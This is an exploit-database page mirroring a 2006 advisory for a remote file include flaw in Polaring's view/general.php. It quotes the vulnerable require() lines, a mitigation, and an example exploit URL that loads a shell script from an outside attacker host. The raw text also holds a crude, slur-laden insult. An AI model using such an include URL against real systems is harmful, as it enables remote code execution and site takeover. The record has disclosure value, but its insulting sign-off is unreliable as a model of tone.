header-logo
Suggest Exploit
vendor:
Polaring
by:
Drago84
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Polaring
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Polaring Remote File Include

Polaring is vulnerable to a remote file include vulnerability. The vulnerable code is located in the general.php file in the /view/ directory. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an arbitrary file path in the _SESSION['dirMain'] parameter. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Declare $_SESSION['dirMain']
Source

Exploit-DB raw data:

###### ToXiC #########################
# 
#Polaring  Remote File Include
#
#BuG FounD  by Drago84
#
#Application Affect: Polaring  Remote File Include
#Source Code:
#http://sourceforge.net/project/showfiles.php?group_id=150989&package_id=166837&release_id=444225
#Problem:
#require($_SESSION['dirMain'].'/view/css.php');
#require($_SESSION['dirMain'].'/view/frontpage.php');
#require($_SESSION['dirMain'].'/view/navigation.php');
#require($_SESSION['dirMain'].'/view/gmaps.php');
#require($_SESSION['dirMain'].'/view/errorReport.php');
#Solution : Declare $_SESSION['dirMain']
#Page Vulnerable : general.php
#Dir             : /view/
# Exempe Of ExPloit is:
#http://www.site.com/polaring_dir/view/general.php?_SESSION['dirMain']=http://marcusbestlamer.gay/shell.php?

#GrEatZ All Member of ToXiC, Str0ke
# Fuck Sonic Il chan italiano + merdoso che esista
# ToXic Security Italian CreW

######
ToXiC
###################

# milw0rm.com [2006-09-25]